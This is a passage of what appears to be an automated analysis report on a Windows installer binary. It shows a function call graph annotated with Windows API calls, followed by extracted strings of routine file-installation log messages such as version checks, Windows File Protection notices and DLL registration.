calls 53413->53414 53414->53411 53420 42c648 53415->53420 53417 42c7c7 53417->53340 53418 42c77d 53418->53417 53427 42c454 IsDBCSLeadByte 53418->53427 53423 42c659 53420->53423 53421 42c6bd 53424 42c6b8 53421->53424 53429 42c454 IsDBCSLeadByte 53421->53429 53423->53421 53426 42c677 53423->53426 53424->53418 53426->53424 53428 42c454 IsDBCSLeadByte 53426->53428 53427->53418 53428->53426 53429->53424 53431 42c648 IsDBCSLeadByte 53430->53431 53432 42c647 53431->53432 53432->53346 53432->53347 53433 46ad18 53434 46ad4e 53433->53434 53469 46b037 53433->53469 53436 46ad8a 53434->53436 53439 46add4 53434->53439 53440 46ade5 53434->53440 53441 46adb2 53434->53441 53442 46adc3 53434->53442 53443 46ada1 53434->53443 53435 403400 4 API calls 53437 46b071 53435->53437 53436->53469 53528 4683b4 53436->53528 53446 403400 4 API calls 53437->53446 53709 46aa98 67 API calls 53439->53709 53710 46aca8 45 API calls 53440->53710 53708 46a790 42 API calls 53441->53708 53493 46a8d8 53442->53493 53473 46a628 53443->53473 53450 46b079 53446->53450 53451 46ae1e 53464 46ae60 53451->53464 53451->53469 53711 493200 53451->53711 53454 46af71 53730 481938 123 API calls 53454->53730 53455 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53455->53464 53458 46af84 53458->53469 53459 42cb8c 6 API calls 53459->53464 53464->53454 53464->53455 53464->53459 53465 46afd8 53464->53465 53466 46b01a 53464->53466 53464->53469 53470 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53464->53470 53531 4682f0 53464->53531 53539 469f08 53464->53539 53546 469640 53464->53546 53599 469fe8 53464->53599 53637 48146c 53464->53637 53739 46a3e4 19 API calls 53464->53739 53731 457114 53465->53731 53467 469fe8 23 API calls 53466->53467 53467->53469 53469->53435 53470->53464 53472 457114 24 API calls 53472->53466 53740 414af8 53473->53740 53475 46a65a 53476 46a69b 53475->53476 53479 493200 18 API calls 53475->53479 53477 46a6a1 53476->53477 53478 46a6d8 53476->53478 53480 46a6c3 53477->53480 53744 46c45c 
53477->53744 53481 46a6e4 GetCursor LoadCursorA SetCursor Sleep SetCursor 53478->53481 53482 46a70d 53478->53482 53479->53476 53748 414b28 53480->53748 53481->53482 53753 47d508 42 API calls 53482->53753 53487 46a6d6 53491 403400 4 API calls 53487->53491 53488 46a721 53488->53487 53490 414b28 4 API calls 53488->53490 53489 403450 4 API calls 53489->53480 53490->53487 53492 46a766 53491->53492 53492->53436 53766 46b4a8 53493->53766 53496 46aa5a 53498 403420 4 API calls 53496->53498 53497 414af8 4 API calls 53500 46a926 53497->53500 53499 46aa74 53498->53499 53501 403400 4 API calls 53499->53501 53526 46aa46 53500->53526 53769 4554a0 13 API calls 53500->53769 53502 46aa7c 53501->53502 53505 403400 4 API calls 53502->53505 53504 403450 4 API calls 53504->53496 53507 46aa84 53505->53507 53506 46a944 53527 46a9a9 53506->53527 53770 465d14 53506->53770 53507->53436 53509 42cd14 7 API calls 53512 46aa1f 53509->53512 53519 450ab8 4 API calls 53512->53519 53512->53526 53516 465d14 19 API calls 53518 46a984 53516->53518 53774 450a88 53518->53774 53522 46aa36 53519->53522 53520 46aa09 53520->53496 53520->53509 53520->53526 53786 47d508 42 API calls 53522->53786 53526->53496 53526->53504 53527->53496 53527->53520 53779 42cd14 53527->53779 53529 4682f0 19 API calls 53528->53529 53530 4683c3 53529->53530 53530->53451 53532 46831f 53531->53532 53533 4078fc 19 API calls 53532->53533 53536 468360 53532->53536 53534 468358 53533->53534 54005 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53534->54005 53537 403400 4 API calls 53536->53537 53538 468378 53537->53538 53538->53464 53540 469f14 53539->53540 53541 469f19 53539->53541 53542 469f17 53540->53542 54006 469974 53540->54006 54091 4691c0 46 API calls 53541->54091 53542->53464 53544 469f21 53544->53464 53547 403400 4 API calls 53546->53547 53548 46966d 53547->53548 54441 47c564 53548->54441 53550 469692 53551 469696 53550->53551 53552 4696ac 53550->53552 54459 465f14 53551->54459 53554 4696a0 53552->53554 54462 4930f0 
LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53552->54462 53557 469771 53554->53557 53558 4697dc 53554->53558 53598 4698a5 53554->53598 53556 403420 4 API calls 53560 4698e1 53556->53560 53561 403494 4 API calls 53557->53561 53562 403494 4 API calls 53558->53562 53559 4696c8 53559->53554 53563 4696d0 53559->53563 53560->53464 53564 46977e 53561->53564 53565 4697e9 53562->53565 53566 469fe8 23 API calls 53563->53566 53568 40357c 4 API calls 53564->53568 53569 40357c 4 API calls 53565->53569 53567 4696dd 53566->53567 54463 42f3d4 53567->54463 53571 46978b 53568->53571 53572 4697f6 53569->53572 53574 40357c 4 API calls 53571->53574 53575 40357c 4 API calls 53572->53575 53578 469798 53574->53578 53576 469803 53575->53576 53580 40357c 4 API calls 53576->53580 53579 40357c 4 API calls 53578->53579 53582 4697a5 53579->53582 53583 469810 53580->53583 53581 469724 53581->53464 53584 465f14 20 API calls 53582->53584 53585 40357c 4 API calls 53583->53585 53586 4697b3 53584->53586 53587 46981e 53585->53587 53588 40357c 4 API calls 53586->53588 53589 414b28 4 API calls 53587->53589 53590 4697bc 53588->53590 53591 4697da 53589->53591 53592 40357c 4 API calls 53590->53592 54480 46624c 53591->54480 53594 4697c9 53592->53594 53595 414b28 4 API calls 53594->53595 53595->53591 53598->53556 53600 4682f0 19 API calls 53599->53600 53602 46a000 53600->53602 53601 46a034 54642 4649f4 53601->54642 53602->53601 53603 4649f4 7 API calls 53602->53603 53603->53601 53607 46a04c 53609 46a133 53607->53609 53610 46a09a 53607->53610 54663 469f9c 19 API calls 53607->54663 53612 46a1f2 GetSystemMenu EnableMenuItem 53609->53612 53611 4682f0 19 API calls 53610->53611 53611->53609 53613 414b28 4 API calls 53612->53613 53614 46a212 53613->53614 53615 46a21e 53614->53615 53616 46a248 53614->53616 53617 414b28 4 API calls 53615->53617 53619 46a264 53616->53619 53620 46a28e 53616->53620 53618 46a232 53617->53618 53621 414b28 4 API calls 53618->53621 53622 414b28 4 API calls 53619->53622 53623 414b28 4 API 
calls 53620->53623 53624 46a246 53621->53624 53625 46a278 53622->53625 53626 46a2a2 53623->53626 54659 469f30 53624->54659 53627 414b28 4 API calls 53625->53627 53628 414b28 4 API calls 53626->53628 53627->53624 53628->53624 53632 4683b4 19 API calls 53635 46a340 53632->53635 53633 46a2e0 53633->53632 53634 46a3a3 53634->53464 53635->53634 54665 49314c 18 API calls 53635->54665 53638 46b4a8 47 API calls 53637->53638 53639 4814af 53638->53639 53640 4814b8 53639->53640 54865 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53639->54865 53642 414af8 4 API calls 53640->53642 53643 4814c8 53642->53643 53644 403450 4 API calls 53643->53644 53645 4814d5 53644->53645 54685 46b7b8 53645->54685 53648 4814e5 53649 414af8 4 API calls 53648->53649 53651 4814f5 53649->53651 53652 403450 4 API calls 53651->53652 53653 481502 53652->53653 53654 468fa8 SendMessageA 53653->53654 53655 48151b 53654->53655 53656 481559 53655->53656 54867 478a14 23 API calls 53655->54867 53658 4241ec 11 API calls 53656->53658 53659 481563 53658->53659 53660 481589 53659->53660 53661 481574 SetActiveWindow 53659->53661 54714 480a68 53660->54714 53661->53660 53708->53436 53709->53436 53710->53436 56585 43d21c 53711->56585 53714 49322c 56590 431424 53714->56590 53715 4932b2 53716 4932c1 53715->53716 56623 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53715->56623 53716->53464 53725 493276 56621 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53725->56621 53727 49328a 56622 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53727->56622 53729 4932aa 53729->53464 53730->53458 53732 457139 53731->53732 53733 457159 53732->53733 53734 4078fc 19 API calls 53732->53734 53736 403400 4 API calls 53733->53736 53735 457151 53734->53735 53737 456f08 24 API calls 53735->53737 53738 45716e 53736->53738 53737->53733 53738->53472 53739->53464 53741 414b06 53740->53741 53742 4034e0 4 API calls 53741->53742 53743 414b13 53742->53743 53743->53475 53745 46a6b6 53744->53745 53746 46c465 
53744->53746 53745->53489 53754 46c53c 53746->53754 53749 414af8 4 API calls 53748->53749 53750 414b4c 53749->53750 53751 403400 4 API calls 53750->53751 53752 414b7d 53751->53752 53752->53487 53753->53488 53755 46c543 53754->53755 53758 45cf00 53755->53758 53759 45cf0b 53758->53759 53760 45cf26 VirtualAlloc 53759->53760 53761 45cf45 53760->53761 53762 45cf4a BZ2_bzDecompressInit 53760->53762 53761->53762 53765 45ce5c 19 API calls 53762->53765 53764 45cf8f 53764->53745 53765->53764 53787 46b534 53766->53787 53769->53506 53772 465d2e 53770->53772 53956 4078fc 53772->53956 53775 450aa8 53774->53775 53975 450960 53775->53975 53999 42cc98 53779->53999 53782 450ab8 53783 450a88 4 API calls 53782->53783 53784 450ad4 53783->53784 53785 47d508 42 API calls 53784->53785 53785->53520 53786->53526 53788 414af8 4 API calls 53787->53788 53789 46b566 53788->53789 53841 465fac 53789->53841 53792 414b28 4 API calls 53793 46b578 53792->53793 53794 46b587 53793->53794 53796 46b5a0 53793->53796 53890 47d508 42 API calls 53794->53890 53799 46b5e7 53796->53799 53801 46b5ce 53796->53801 53797 403420 4 API calls 53798 46a90a 53797->53798 53798->53496 53798->53497 53800 46b64c 53799->53800 53809 46b5eb 53799->53809 53893 42cb18 CharNextA 53800->53893 53891 47d508 42 API calls 53801->53891 53804 46b65b 53805 46b65f 53804->53805 53810 46b678 53804->53810 53894 47d508 42 API calls 53805->53894 53807 46b633 53892 47d508 42 API calls 53807->53892 53809->53807 53809->53810 53811 46b69c 53810->53811 53850 46611c 53810->53850 53895 47d508 42 API calls 53811->53895 53817 46b6b5 53818 403778 4 API calls 53817->53818 53819 46b6cb 53818->53819 53858 42c968 53819->53858 53822 46b6dc 53896 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53822->53896 53823 46b70a 53824 42c898 5 API calls 53823->53824 53826 46b715 53824->53826 53862 42c40c 53826->53862 53827 46b6ef 53829 450ab8 4 API calls 53827->53829 53831 46b6fc 53829->53831 53830 46b720 53872 42cb8c 53830->53872 53897 47d508 42 API calls 
53831->53897 53835 46b59b 53835->53797 53846 465fc6 53841->53846 53842 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53842->53846 53844 42cb8c 6 API calls 53844->53846 53845 403450 4 API calls 53845->53846 53846->53842 53846->53844 53846->53845 53847 46600f 53846->53847 53899 42ca78 53846->53899 53848 403420 4 API calls 53847->53848 53849 466029 53848->53849 53849->53792 53852 466126 53850->53852 53851 466139 53851->53811 53854 46614c 53851->53854 53852->53851 53929 42cb08 CharNextA 53852->53929 53856 466156 53854->53856 53855 466183 53855->53811 53855->53817 53856->53855 53930 42cb08 CharNextA 53856->53930 53859 42c9c1 53858->53859 53860 42c97e 53858->53860 53859->53822 53859->53823 53860->53859 53931 42cb08 CharNextA 53860->53931 53863 42c416 53862->53863 53864 42c439 53862->53864 53932 42c948 CharPrevA 53863->53932 53865 403494 4 API calls 53864->53865 53867 42c442 53865->53867 53867->53830 53868 42c41d 53868->53864 53869 42c428 53868->53869 53933 4035c0 53869->53933 53871 42c436 53871->53830 53873 42c648 IsDBCSLeadByte 53872->53873 53876 42cb9d 53873->53876 53874 42cbc4 53876->53874 53955 42cb10 CharPrevA 53876->53955 53890->53835 53891->53835 53892->53835 53893->53804 53894->53835 53895->53835 53896->53827 53897->53835 53900 403494 4 API calls 53899->53900 53901 42ca88 53900->53901 53906 42cabe 53901->53906 53908 403744 53901->53908 53912 42c454 IsDBCSLeadByte 53901->53912 53904 42cb02 53904->53846 53906->53904 53913 4037b8 53906->53913 53918 42c454 IsDBCSLeadByte 53906->53918 53909 40374a 53908->53909 53911 40375b 53908->53911 53910 4034bc 4 API calls 53909->53910 53909->53911 53910->53911 53911->53901 53912->53901 53914 403744 4 API calls 53913->53914 53916 4037c6 53914->53916 53915 4037fc 53915->53906 53916->53915 53919 4038a4 53916->53919 53918->53906 53920 4038b1 53919->53920 53927 4038e1 53919->53927 53922 4038da 53920->53922 53925 4038bd 53920->53925 53921 403400 4 API calls 53924 4038cb 53921->53924 53923 4034bc 4 API calls 53922->53923 
53923->53927 53924->53915 53928 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53925->53928 53927->53921 53928->53924 53929->53852 53930->53856 53931->53860 53932->53868 53934 4035c4 53933->53934 53940 40357c 53933->53940 53935 403450 53934->53935 53936 4035e2 53934->53936 53937 4035d4 53934->53937 53934->53940 53939 4034bc 4 API calls 53935->53939 53944 403464 53935->53944 53943 4034bc 4 API calls 53936->53943 53942 403450 4 API calls 53937->53942 53939->53944 53940->53935 53941 4035bf 53940->53941 53945 40358a 53940->53945 53941->53871 53942->53940 53946 4035b4 53945->53946 53947 40359d 53945->53947 53955->53876 53959 407910 53956->53959 53960 40792d 53959->53960 53967 4075c0 53960->53967 53963 407959 53965 4034e0 4 API calls 53963->53965 53966 40790b 53965->53966 53966->53516 53970 4075db 53967->53970 53968 4075ed 53968->53963 53972 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53968->53972 53970->53968 53973 4076e2 19 API calls 53970->53973 53974 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53970->53974 53972->53963 53973->53970 53974->53970 53976 403400 4 API calls 53975->53976 53978 450991 53976->53978 53984 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53978->53984 53984->53978 54000 42cb8c 6 API calls 53999->54000 54001 42ccba 54000->54001 54002 42ccc2 GetFileAttributesA 54001->54002 54003 403400 4 API calls 54002->54003 54004 42ccdf 54003->54004 54004->53520 54004->53782 54005->53536 54008 4699bb 54006->54008 54007 469e33 54009 469e4e 54007->54009 54010 469e7f 54007->54010 54008->54007 54011 469a76 54008->54011 54015 403494 4 API calls 54008->54015 54014 403494 4 API calls 54009->54014 54012 403494 4 API calls 54010->54012 54013 469a97 54011->54013 54017 469ad8 54011->54017 54016 469e8d 54012->54016 54018 403494 4 API calls 54013->54018 54019 469e5c 54014->54019 54020 4699fa 54015->54020 54113 46889c 12 API calls 54016->54113 54021 403400 4 API calls 54017->54021 54023 469aa5 54018->54023 54112 46889c 12 API 
calls 54019->54112 54025 414af8 4 API calls 54020->54025 54026 469ad6 54021->54026 54027 414af8 4 API calls 54023->54027 54029 469a1b 54025->54029 54049 469bbc 54026->54049 54092 468fa8 54026->54092 54031 469ac6 54027->54031 54028 469e6a 54030 403400 4 API calls 54028->54030 54032 403634 4 API calls 54029->54032 54034 469eb0 54030->54034 54036 403634 4 API calls 54031->54036 54037 469a2b 54032->54037 54041 403400 4 API calls 54034->54041 54035 469c44 54039 403400 4 API calls 54035->54039 54036->54026 54038 414af8 4 API calls 54037->54038 54042 469a3f 54038->54042 54043 469c42 54039->54043 54040 469af8 54044 469b36 54040->54044 54045 469afe 54040->54045 54046 469eb8 54041->54046 54042->54011 54051 414af8 4 API calls 54042->54051 54107 4693e4 43 API calls 54043->54107 54050 403400 4 API calls 54044->54050 54047 403494 4 API calls 54045->54047 54048 403420 4 API calls 54046->54048 54052 469b0c 54047->54052 54053 469ec5 54048->54053 54049->54035 54054 469c03 54049->54054 54055 469b34 54050->54055 54056 469a66 54051->54056 54098 47ad88 54052->54098 54053->53542 54059 403494 4 API calls 54054->54059 54101 46929c 54055->54101 54060 403634 4 API calls 54056->54060 54063 469c11 54059->54063 54060->54011 54061 469c6d 54070 469cce 54061->54070 54071 469c78 54061->54071 54062 469b24 54065 403634 4 API calls 54062->54065 54066 414af8 4 API calls 54063->54066 54065->54055 54067 469c32 54066->54067 54069 403634 4 API calls 54067->54069 54068 469b5d 54074 469bbe 54068->54074 54075 469b68 54068->54075 54069->54043 54072 403400 4 API calls 54070->54072 54073 403494 4 API calls 54071->54073 54076 469cd6 54072->54076 54080 469c86 54073->54080 54077 403400 4 API calls 54074->54077 54078 403494 4 API calls 54075->54078 54079 469ccc 54076->54079 54090 469d7f 54076->54090 54077->54049 54083 469b76 54078->54083 54079->54076 54108 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54079->54108 54080->54076 54080->54079 54085 403634 4 API calls 54080->54085 54082 469cf9 54082->54090 54109 
49339c 18 API calls 54082->54109 54083->54049 54086 403634 4 API calls 54083->54086 54085->54080 54086->54083 54088 469e20 54111 429154 SendMessageA SendMessageA 54088->54111 54110 429104 SendMessageA 54090->54110 54091->53544 54114 42a050 SendMessageA 54092->54114 54094 468fb7 54095 468fd7 54094->54095 54115 42a050 SendMessageA 54094->54115 54095->54040 54097 468fc7 54097->54040 54116 47ada8 54098->54116 54106 4692c9 54101->54106 54102 46932b 54103 403400 4 API calls 54102->54103 54104 469340 54103->54104 54104->54068 54106->54102 54440 469220 43 API calls 54106->54440 54107->54061 54108->54082 54109->54090 54110->54088 54111->54007 54112->54028 54113->54028 54114->54094 54115->54097 54117 403494 4 API calls 54116->54117 54121 47addb 54117->54121 54118 47aee0 54119 403420 4 API calls 54118->54119 54120 47ada3 54119->54120 54120->54062 54121->54118 54123 403778 4 API calls 54121->54123 54127 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54121->54127 54128 479cfc 54121->54128 54360 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54121->54360 54361 403800 54121->54361 54365 42c948 CharPrevA 54121->54365 54123->54121 54127->54121 54129 479d4e 54128->54129 54132 479d2c 54128->54132 54130 479d6e 54129->54130 54131 479d5c 54129->54131 54135 479dd1 54130->54135 54136 479d7c 54130->54136 54133 403494 4 API calls 54131->54133 54132->54129 54370 478c2c 19 API calls 54132->54370 54228 479d69 54133->54228 54146 479df2 54135->54146 54147 479ddf 54135->54147 54138 479d85 54136->54138 54139 479dab 54136->54139 54137 403400 4 API calls 54140 47a67c 54137->54140 54141 479d98 54138->54141 54371 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54138->54371 54142 479dbe 54139->54142 54372 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54139->54372 54144 403400 4 API calls 54140->54144 54149 403494 4 API calls 54141->54149 54145 403494 4 API calls 54142->54145 54150 47a684 54144->54150 54145->54228 54152 479e13 54146->54152 54153 479e00 54146->54153 54151 
403494 4 API calls 54147->54151 54149->54228 54150->54121 54151->54228 54155 479e63 54152->54155 54156 479e21 54152->54156 54154 403494 4 API calls 54153->54154 54154->54228 54161 479e84 54155->54161 54162 479e71 54155->54162 54157 479e3d 54156->54157 54158 479e2a 54156->54158 54160 479e50 54157->54160 54373 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54157->54373 54159 403494 4 API calls 54158->54159 54159->54228 54164 403494 4 API calls 54160->54164 54166 479ea5 54161->54166 54167 479e92 54161->54167 54165 403494 4 API calls 54162->54165 54164->54228 54165->54228 54169 479ec6 54166->54169 54170 479eb3 54166->54170 54168 403494 4 API calls 54167->54168 54168->54228 54172 479ee7 54169->54172 54173 479ed4 54169->54173 54171 403494 4 API calls 54170->54171 54171->54228 54175 479ef5 54172->54175 54176 479f24 54172->54176 54174 403494 4 API calls 54173->54174 54174->54228 54177 479f11 54175->54177 54178 479efe 54175->54178 54181 479f32 54176->54181 54182 479f61 54176->54182 54180 403494 4 API calls 54177->54180 54179 403494 4 API calls 54178->54179 54179->54228 54180->54228 54183 479f4e 54181->54183 54184 479f3b 54181->54184 54187 479f82 54182->54187 54188 479f6f 54182->54188 54228->54137 54360->54121 54362 403804 54361->54362 54364 40382f 54361->54364 54363 4038a4 4 API calls 54362->54363 54363->54364 54364->54121 54365->54121 54370->54132 54371->54141 54372->54142 54373->54160 54440->54106 54442 47c592 54441->54442 54446 47c5c8 54441->54446 54484 455228 54442->54484 54443 403420 4 API calls 54444 47c6dc 54443->54444 54444->53550 54446->54443 54447 47c6a5 54447->53550 54448 47c5bc 54448->54446 54448->54447 54451 47ad88 43 API calls 54448->54451 54456 47c651 54448->54456 54491 478218 54448->54491 54502 47830c 54448->54502 54506 47c12c 31 API calls 54448->54506 54451->54448 54452 47ad88 43 API calls 54452->54456 54454 42c8f8 5 API calls 54454->54456 54455 42c920 5 API calls 54455->54456 54456->54448 54456->54452 54456->54454 54456->54455 54458 47c692 
54456->54458 54507 47c274 58 API calls 54456->54507 54458->54446 54569 465e28 54459->54569 54462->53559 54464 42f3e0 54463->54464 54465 42f403 GetActiveWindow GetFocus 54464->54465 54466 41eeb4 2 API calls 54465->54466 54467 42f41a 54466->54467 54468 42f437 54467->54468 54469 42f427 RegisterClassA 54467->54469 54470 42f4c6 SetFocus 54468->54470 54471 42f445 CreateWindowExA 54468->54471 54469->54468 54473 403400 4 API calls 54470->54473 54471->54470 54472 42f478 54471->54472 54600 42428c 54472->54600 54475 42f4e2 54473->54475 54479 49339c 18 API calls 54475->54479 54476 42f4a0 54477 42f4a8 CreateWindowExA 54476->54477 54477->54470 54478 42f4be ShowWindow 54477->54478 54478->54470 54479->53581 54606 44ad68 54480->54606 54485 455239 54484->54485 54486 455246 54485->54486 54487 45523d 54485->54487 54516 45500c 29 API calls 54486->54516 54508 454f2c 54487->54508 54490 455243 54490->54448 54492 47822e 54491->54492 54493 47822a 54491->54493 54494 403450 4 API calls 54492->54494 54493->54448 54495 47823b 54494->54495 54496 478241 54495->54496 54497 47825b 54495->54497 54545 4780d8 54496->54545 54499 4780d8 19 API calls 54497->54499 54500 478257 54499->54500 54501 403400 4 API calls 54500->54501 54501->54493 54504 478318 54502->54504 54503 478333 54503->54448 54504->54503 54568 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54504->54568 54506->54448 54507->54456 54517 42dd44 54508->54517 54510 454f49 54511 454f97 54510->54511 54520 454e60 54510->54520 54511->54490 54514 454e60 6 API calls 54515 454f78 RegCloseKey 54514->54515 54515->54490 54516->54490 54518 42dd55 RegOpenKeyExA 54517->54518 54519 42dd4f 54517->54519 54518->54510 54519->54518 54525 42dc80 54520->54525 54522 403420 4 API calls 54523 454f12 54522->54523 54523->54514 54524 454e88 54524->54522 54528 42db28 54525->54528 54529 42db4e RegQueryValueExA 54528->54529 54535 42db71 54529->54535 54544 42db93 54529->54544 54530 403400 4 API calls 54532 42dc5f 54530->54532 54531 42db8b 54533 403400 4 API calls 
54531->54533 54532->54524 54533->54544 54534 4034e0 4 API calls 54534->54535 54535->54531 54535->54534 54536 403744 4 API calls 54535->54536 54535->54544 54537 42dbc8 RegQueryValueExA 54536->54537 54537->54529 54538 42dbe4 54537->54538 54539 4038a4 4 API calls 54538->54539 54538->54544 54540 42dc26 54539->54540 54541 42dc38 54540->54541 54543 403744 4 API calls 54540->54543 54542 403450 4 API calls 54541->54542 54542->54544 54543->54541 54544->54530 54546 4780f3 54545->54546 54547 4781b2 54546->54547 54550 478124 54546->54550 54563 477f8c 19 API calls 54546->54563 54547->54500 54549 478149 54553 47816a 54549->54553 54565 477f8c 19 API calls 54549->54565 54550->54549 54564 477f8c 19 API calls 54550->54564 54553->54547 54554 4781aa 54553->54554 54566 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54553->54566 54557 477e10 54554->54557 54558 477e4b 54557->54558 54559 403450 4 API calls 54558->54559 54560 477e70 54559->54560 54567 476500 19 API calls 54560->54567 54562 477eb1 54562->54547 54563->54550 54564->54549 54565->54553 54566->54554 54567->54562 54568->54503 54570 403494 4 API calls 54569->54570 54571 465e56 54570->54571 54586 42daf0 54571->54586 54574 42daf0 5 API calls 54575 465e7a 54574->54575 54576 465d14 19 API calls 54575->54576 54577 465e84 54576->54577 54578 42daf0 5 API calls 54577->54578 54579 465e93 54578->54579 54589 465d8c 54579->54589 54582 42daf0 5 API calls 54583 465eac 54582->54583 54584 403400 4 API calls 54583->54584 54585 465ec1 54584->54585 54585->53554 54593 42da38 54586->54593 54590 465dac 54589->54590 54591 4078fc 19 API calls 54590->54591 54592 465df6 54591->54592 54592->54582 54594 42dae3 54593->54594 54595 42da58 54593->54595 54594->54574 54595->54594 54596 4037b8 4 API calls 54595->54596 54598 403800 4 API calls 54595->54598 54599 42c454 IsDBCSLeadByte 54595->54599 54596->54595 54598->54595 54599->54595 54601 4242be 54600->54601 54602 42429e GetWindowTextA 54600->54602 54604 403494 4 API calls 54601->54604 54603 4034e0 4 API 
calls 54602->54603 54605 4242bc 54603->54605 54604->54605 54605->54476 54609 44abe0 54606->54609 54610 44ac13 54609->54610 54611 414af8 4 API calls 54610->54611 54612 44ac26 54611->54612 54613 44ac53 73A0A570 54612->54613 54614 40357c 4 API calls 54612->54614 54620 41a1f8 54613->54620 54614->54613 54621 41a223 54620->54621 54622 41a2bf 54620->54622 54639 403520 54621->54639 54623 403400 4 API calls 54622->54623 54624 41a2d7 SelectObject 54623->54624 54640 4034e0 4 API calls 54639->54640 54644 4649ff 54642->54644 54643 464ada 54653 4667a4 54643->54653 54644->54643 54648 464a4f 54644->54648 54666 421a2c 54644->54666 54645 464a92 54645->54643 54672 4185c8 7 API calls 54645->54672 54648->54645 54649 464a94 54648->54649 54650 464a89 54648->54650 54651 421a2c 7 API calls 54649->54651 54652 421a2c 7 API calls 54650->54652 54651->54645 54652->54645 54654 4667d4 54653->54654 54655 4667b5 54653->54655 54654->53607 54656 414b28 4 API calls 54655->54656 54657 4667c3 54656->54657 54658 414b28 4 API calls 54657->54658 54658->54654 54660 469f3d 54659->54660 54661 421a2c 7 API calls 54660->54661 54662 469f96 54661->54662 54662->53633 54664 466274 18 API calls 54662->54664 54663->53610 54664->53633 54665->53634 54667 421a84 54666->54667 54670 421a3a 54666->54670 54667->54648 54668 421a69 54668->54667 54681 421d38 SetFocus GetFocus 54668->54681 54670->54668 54673 408cc4 54670->54673 54672->54643 54674 408cd0 54673->54674 54682 406df4 LoadStringA 54674->54682 54677 403450 4 API calls 54678 408d01 54677->54678 54679 403400 4 API calls 54678->54679 54680 408d16 54679->54680 54680->54668 54681->54667 54683 4034e0 4 API calls 54682->54683 54684 406e21 54683->54684 54684->54677 54686 46b7e1 54685->54686 54687 46b82e 54686->54687 54688 414af8 4 API calls 54686->54688 54689 403420 4 API calls 54687->54689 54690 46b7f7 54688->54690 54692 46b8d8 54689->54692 54873 466038 6 API calls 54690->54873 54692->53648 54866 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54692->54866 
54693 46b7ff 54694 414b28 4 API calls 54693->54694 54695 46b80d 54694->54695 54696 46b81a 54695->54696 54698 46b833 54695->54698 54874 47d508 42 API calls 54696->54874 54699 46b84b 54698->54699 54701 46611c CharNextA 54698->54701 54875 47d508 42 API calls 54699->54875 54702 46b847 54701->54702 54702->54699 54703 46b861 54702->54703 54704 46b867 54703->54704 54705 46b87d 54703->54705 54876 47d508 42 API calls 54704->54876 54707 42c968 CharNextA 54705->54707 54708 46b88a 54707->54708 54708->54687 54877 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54708->54877 54710 46b8a1 54711 450ab8 4 API calls 54710->54711 54712 46b8ae 54711->54712 54878 47d508 42 API calls 54712->54878 54715 480ab9 54714->54715 54716 480a8b 54714->54716 54718 4749c8 54715->54718 54879 49314c 18 API calls 54716->54879 54880 456f08 54718->54880 54721 4072b0 SetCurrentDirectoryA 54722 474a1e 54721->54722 54901 46d33c 54722->54901 54867->53656 54873->54693 54874->54687 54875->54687 54876->54687 54877->54710 54878->54687 54879->54715 54881 456f34 54880->54881 54896 45703c 54880->54896 55421 456c04 GetSystemTimeAsFileTime FileTimeToSystemTime 54881->55421 54882 45708d 54885 403400 4 API calls 54882->54885 54887 4570a2 54885->54887 54886 456f3c 54888 4078fc 19 API calls 54886->54888 54887->54721 54889 456fad 54888->54889 55422 456ef8 20 API calls 54889->55422 54896->54882 55425 456774 6 API calls 54896->55425 55421->54886 55425->54882 56624 431740 56585->56624 56587 403400 4 API calls 56588 43d2ca 56587->56588 56588->53714 56588->53715 56589 43d246 56589->56587 56591 43142a 56590->56591 56592 402648 4 API calls 56591->56592 56593 43145a 56592->56593 56594 492c58 56593->56594 56595 492d2d 56594->56595 56599 492c72 56594->56599 56601 492d70 56595->56601 56596 4335c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56596->56599 56599->56595 56599->56596 56600 403450 4 API calls 56599->56600 56629 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56599->56629 56630 4314f4 56599->56630 
                                                                                            Strings
                                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                                            • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                                            • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                                            • Installing the file., xrefs: 0046FEED
                                                                                            • @, xrefs: 0046F794
                                                                                            • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                                            • Will register the file (a type library) later., xrefs: 004704D0
                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                                            • Time stamp of our file: %s, xrefs: 0046F97F
                                                                                            • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                                            • -- File entry --, xrefs: 0046F6DF
                                                                                            • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                                            • Dest file exists., xrefs: 0046F99F
                                                                                            • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                                            • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                                            • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                                            • Version of our file: (none), xrefs: 0046FAE0
                                                                                            • Installing into GAC, xrefs: 004706D1
                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
